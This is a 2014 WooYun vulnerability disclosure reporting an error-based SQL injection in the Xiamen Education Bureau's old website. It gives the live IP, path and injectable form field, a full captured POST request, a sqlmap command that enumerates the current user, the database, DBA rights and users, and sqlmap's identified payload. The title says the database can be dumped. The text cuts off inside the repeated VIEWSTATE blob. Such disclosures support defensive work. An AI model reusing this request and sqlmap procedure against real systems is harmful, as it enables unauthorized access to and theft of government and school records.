当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073465

漏洞标题:厦门市教育局SQL注入,可脱裤

相关厂商:CCERT教育网应急响应组

漏洞作者: 小饼仔

提交时间:2014-08-25 14:42

修复时间:2014-08-30 14:44

公开时间:2014-08-30 14:44

漏洞类型:SQL注入

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-25: 细节已通知厂商并且等待厂商处理中
2014-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

厦门市教育局网站POST注入,可脱裤。
网站有分新版和旧版
直接从http://www.xmedu.gov.cn/是新版
从http://220.160.119.31:81进去是旧版
旧版首页内容是旧的,但是 政民互动 里面的内容是最近的,这里面存在注入,但是新版里面找不到这个网页
数据库里面有个库名是 HuilanCInfo,查了一下是中科汇联 http://www.huilan.com/

详细说明:

地址:http://220.160.119.31:81/tabid/289/Default.aspx

证据1.jpg


页面查询存在注入,POST请求:
POST /tabid/289/Default.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://220.160.119.31:81/tabid/289/Default.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7de28324bf0da6
Accept-Encoding: gzip, deflate
Host: 220.160.119.31:81
Content-Length: 10130
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: .ASPXANONYMOUS=htWCec7zzwEkAAAAMGNiNDdjYjYtZThlNC00NjY1LWFiOTktZWNiZjBjNTZkZDRl0; language_0=zh-CN; CNZZDATA5143399=cnzz_eid%3D2076919176-1408624673-%26ntime%3D1408624673
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTTARGET"
ess$ctr1035$InteractConsultList$libSearch
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUJNjcwNjk2ODMxD2QWBmYPFgIeBFRleHQFeTwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj5kAgEPZBYQAgUPFgIeB1Zpc2libGVoZAIGDxYCHgdjb250ZW50BQzmlL/msJHkupLliqhkAgcPFgIfAgUZ5pS/5rCR5LqS5YqoLEVhc3lTaXRlLEVTU2QCCA8WAh8CBTlDb3B5cmlnaHQgMjAxMSBieSBIdWlsYW4gSW5mb3JtYXRpb24gVGVjaG5vbG9neSBDby4sIEx0ZC5kAgkPFgIfAgUJRWFzeVNpdGUgZAIKDxYCHwIFDOaUv+awkeS6kuWKqGQCDQ8WAh8CBQ1JTkRFWCwgRk9MTE9XZAIRDxYCHglpbm5lcmh0bWwF6Q4uZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1iY3RyIHtib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7ICBiYWNrZ3JvdW5kLWNvbG9yOiBUcmFuc3BhcmVudDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1iYXIge2N1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBoZWlnaHQ6MDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1pdG0ge2N1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBjb2xvcjogVHJhbnNwYXJlbnQ7IGZvbnQtc2l6ZTogMTJwdDsgZm9udC13ZWlnaHQ6IG5vcm1hbDsgZm9udC1zdHlsZTogbm9ybWFsOyBib3JkZXItbGVmdDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyBib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtaWNuIHtjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYmFja2dyb3VuZC1jb2xvcjogVHJhbnNwYXJlbnQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAxcHggc29saWQ7IGJvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDFweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMXB4IHNvbGlkOyB0ZXh0LWFsaWduOiBjZW50ZXI7IHdpZHRoOiAxNTtoZWlnaHQ6IDA7fQ0KZGlzcGxheTpub25lOy5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbXN1YiB7ei1pbmRleDogMTAwMDsgY3Vyc29yOiBwb2ludGVyOyBjdXJzb3I6IGhhbmQ7IGJhY2tncm91bmQtY29sb3I6IFRyYW5zcGFyZW50OyBib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtYnJrIHtib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgIGJvcmRlci1yaWdodDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyAvKmJhY2tncm91bmQtY29sb3I6IFdoaXRlOyBoZWlnaHQ6IDFweCovO30NCi5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbWl0bXNlbCB7YmFja2dyb3VuZC1jb2xvcjogVHJhbnNwYXJlbnQ7IGN1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBjb2xvcjogVHJhbnNwYXJlbnQ7IGZvbnQtc2l6ZTogMTJwdDsgZm9udC13ZWlnaHQ6IG5vcm1hbDsgZm9udC1zdHlsZTogbm9ybWFsO30NCi5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbWFydyB7Lypmb250LWZhbWlseTogd2ViZGluZ3MqLzsgZm9udC1zaXplOiAxMHB0OyBjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAxcHggc29saWQ7IGJvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDFweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkO30NCmRpc3BsYXk6bm9uZTsuZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1yYXJ3IHtmb250LWZhbWlseTogd2ViZGluZ3M7IGZvbnQtc2l6ZTogMTBwdDsgY3Vyc29yOiBwb2ludGVyOyBjdXJzb3I6IGhhbmQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtaXRtc2NyIHt3aWR0aDogMTAwJTsgZm9udC1zaXplOiA2cHQ7fQ0KZAICD2QWAgIBD2QWBmYPZBYCZg8WAh8BaBYEAgEPZBYGAgMPEGRkFgBkAgUPDxYCHwFoZGQCCw9kFgJmDw8WBh4ISW1hZ2VVcmwFFC9pbWFnZXMvY29sbGFwc2UuZ2lmHg1BbHRlcm5hdGVUZXh0BQnmnIDlsI/ljJYeB1Rvb2xUaXAFCeacgOWwj+WMlhYKHgd1c2VyY3RyBQlVc2FiaWxpdHkeB3VzZXJrZXkFFENvbnRyb2xQYW5lbFZpc2libGUwHgdvbmNsaWNrBUVpZiAoX19lc3NfU2VjdGlvbk1heE1pbih0aGlzLCAgJ1JpYmJvbkJhci5hc2N4X1BhZ2VzJykpIHJldHVybiBmYWxzZTseCG1heF9pY29uBRIvaW1hZ2VzL2V4cGFuZC5naWYeCG1pbl9pY29uBRQvaW1hZ2VzL2NvbGxhcHNlLmdpZmQCAw9kFgRmDxQrAAIUKwACDxYGHg1TZWxlY3RlZEluZGV4Zh4EU2tpbgUHRGVmYXVsdB4TRW5hYmxlRW1iZWRkZWRTa2luc2hkEBYG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
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ScrollTop"
228
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__essVariable"
{"__scdoff":"1","__ess_pageload":"__ess_setScrollTop();"}
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="Q"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$ddlCategoryId"
-1
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtKeyWord"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtIndexNumber"
30143
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtName"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$wuPager$txtPageNum"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu"
各区教育局
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu2"
直属单位
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu4"
直属学校
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu6"
省市教育站点
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu5"
省政府机关
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu7"
专题网站
-----------------------------7de28324bf0da6--
该字段存在error-based注入:
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtIndexNumber"
30143

漏洞证明:

python sqlmap.py -r post.txt --current-user --current-db --is-dba --users
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: MULTIPART #9*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: -----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTTARGET"
ess$ctr1035$InteractConsultList$libSearch
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUJNjcwNjk2ODMxD2QWBmYPFgIeBFRleHQFeTwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj5kAgEPZBYQAgUPFgIeB1Zpc2libGVoZAIGDxYCHgdjb250ZW50BQzmlL/msJHkupLliqhkAgcPFgIfAgUZ5pS/5rCR5LqS5YqoLEVhc3lTaXRlLEVTU2QCCA8WAh8CBTlDb3B5cmlnaHQgMjAxMSBieSBIdWlsYW4gSW5mb3JtYXRpb24gVGVjaG5vbG9neSBDby4sIEx0ZC5kAgkPFgIfAgUJRWFzeVNpdGUgZAIKDxYCHwIFDOaUv+awkeS6kuWKqGQCDQ8WAh8CBQ1JTkRFWCwgRk9MTE9XZAIRDxYCHglpbm5lcmh0bWwF6Q4uZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1iY3RyIHtib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7ICBiYWNrZ3JvdW5kLWNvbG9yOiBUcmFuc3BhcmVudDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1iYXIge2N1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBoZWlnaHQ6MDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1pdG0ge2N1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBjb2xvcjogVHJhbnNwYXJlbnQ7IGZvbnQtc2l6ZTogMTJwdDsgZm9udC13ZWlnaHQ6IG5vcm1hbDsgZm9udC1zdHlsZTogbm9ybWFsOyBib3JkZXItbGVmdDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyBib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtaWNuIHtjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYmFja2dyb3VuZC1jb2xvcjogVHJhbnNwYXJlbnQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAxcHggc29saWQ7IGJvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDFweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMXB4IHNvbGlkOyB0ZXh0LWFsaWduOiBjZW50ZXI7IHdpZHRoOiAxNTtoZWlnaHQ6IDA7fQ0KZGlzcGxheTpub25lOy5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbXN1YiB7ei1pbmRleDogMTAwMDsgY3Vyc29yOiBwb2ludGVyOyBjdXJzb3I6IGhhbmQ7IGJhY2tncm91bmQtY29sb3I6IFRyYW5zcGFyZW50OyBib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtYnJrIHtib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgIGJvcmRlci1yaWdodDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyAvKmJhY2tncm91bmQtY29sb3I6IFdoaXRlOyBoZWlnaHQ6IDFweCovO30NCi5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbWl0bXNlbCB7YmFja2dyb3VuZC1jb2xvcjogVHJhbnNwYXJlbnQ7IGN1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBjb2xvcjogVHJhbnNwYXJlbnQ7IGZvbnQtc2l6ZTogMTJwdDsgZm9udC13ZWlnaHQ6IG5vcm1hbDsgZm9udC1zdHlsZTogbm9ybWFsO30NCi5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbWFydyB7Lypmb250LWZhbWlseTogd2ViZGluZ3MqLzsgZm9udC1zaXplOiAxMHB0OyBjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAxcHggc29saWQ7IGJvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDFweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkO30NCmRpc3BsYXk6bm9uZTsuZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1yYXJ3IHtmb250LWZhbWlseTogd2ViZGluZ3M7IGZvbnQtc2l6ZTogMTBwdDsgY3Vyc29yOiBwb2ludGVyOyBjdXJzb3I6IGhhbmQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtaXRtc2NyIHt3aWR0aDogMTAwJTsgZm9udC1zaXplOiA2cHQ7fQ0KZAICD2QWAgIBD2QWBmYPZBYCZg8WAh8BaBYEAgEPZBYGAgMPEGRkFgBkAgUPDxYCHwFoZGQCCw9kFgJmDw8WBh4ISW1hZ2VVcmwFFC9pbWFnZXMvY29sbGFwc2UuZ2lmHg1BbHRlcm5hdGVUZXh0BQnmnIDlsI/ljJYeB1Rvb2xUaXAFCeacgOWwj+WMlhYKHgd1c2VyY3RyBQlVc2FiaWxpdHkeB3VzZXJrZXkFFENvbnRyb2xQYW5lbFZpc2libGUwHgdvbmNsaWNrBUVpZiAoX19lc3NfU2VjdGlvbk1heE1pbih0aGlzLCAgJ1JpYmJvbkJhci5hc2N4X1BhZ2VzJykpIHJldHVybiBmYWxzZTseCG1heF9pY29uBRIvaW1hZ2VzL2V4cGFuZC5naWYeCG1pbl9pY29uBRQvaW1hZ2VzL2NvbGxhcHNlLmdpZmQCAw9kFgRmDxQrAAIUKwACDxYGHg1TZWxlY3RlZEluZGV4Zh4EU2tpbgUHRGVmYXVsdB4TRW5hYmxlRW1iZWRkZWRTa2luc2hkEBYGZgIBAgICAwIEAgUWBhQrAAJkZBQrAAJkZBQrAAIPFgIfAWhkZBQrAAIPFgIfAWhkZBQrAAJkZBQrAAJkZA8WBmZmZmZmZhYBBW5UZWxlcmlrLldlYi5VSS5SYWRUYWIsIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTEuMS41MTkuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNGQWBAICDw8WAh8BaGRkAgMPDxYCHwFoZGQCAQ8UKwACDxYCHwxmZBUGCFBhZ2VIb21lC1BhZ2VDdXJyZW50DFBhZ2VGYXZvcml0ZQpQYWdlTWFuYWdlCFBhZ2VTaXRlDlBhZ2VIb3N0U3lzdGVtFgQCAg8PFgIfAWhkZAIDDw8WAh8BaGRkAgoPZBYCZg9kFhQCAQ9kFgICAQ9kFgQCAQ8PFgIfAWhkZAIDD2QWAgIBDw9kFgIeBWNsYXNzBQtNb2RFU1NIVE1MQ2QCAw9kFgICAQ9kFgQCAQ8PFgIfAWhkZAIDD2QWAgIBDw9kFgIfDwULTW9kRVNTSFRNTENkAgUPZBYCAgEPZBYEAgEPDxYCHwFoZGQCAw9kFgICAQ8PZBYCHw8FC01vZEVTU0hUTUxDZAIHD2QWAgIBD2QWBAIBDw8WAh8BaGRkAgMPZBYCAgEPD2QWAh8PBQtNb2RFU1NIVE1MQ2QCDQ9kFgICAQ9kFgQCAQ8PFgIfAWhkZAIDD2QWAgIBDw9kFgIfDwULTW9kRVNTSFRNTENkAg8PZBYCAgEPZBYGZg8PFgIfAWhkZAICD2QWAgICDxYCHwFoFgZmDxYCHwZkZAIBDxYCHwZkZAICDxYCHwZkZAIED2QWAgIBDw9kFgIfDwUWTW9k5LqS5Yqo5ZKo6K+i5YiG57G7QxYCAgEPDxYCHgRDYXRlAv////8PZBYCAgEPPCsACwEADxYMHhVfIURhdGFTb3VyY2VJdGVtQ291bnQCDB4LXyFJdGVtQ291bnQCDB4JUGFnZUNvdW50AgEeDERhdGFLZXlGaWVsZAUKQ2F0ZWdvcnlJZB4IRGF0YUtleXMWDAIBAgICAwIEAgUCBgIHAggCCQIKAgsCDB4NVG90YWxSb3dDb3VudAIMZBYCZg9kFhgCAQ9kFgJmD2QWAgIBDw8WCB4LTmF2aWdhdGVVcmwFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9MR8ABQzmi5vnlJ/ogIPor5UeCENzc0NsYXNzBQpsaW5rU2V0T2ZmHgRfIVNCAgJkZAICD2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9Mh8ABRXkuK3lsI/lubzlrabnlJ/lhaXlraYfGAUKbGlua1NldE9mZh8ZAgJkZAIDD2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9Mx8ABQzmlZnluIjmi5vogZgfGAUKbGlua1N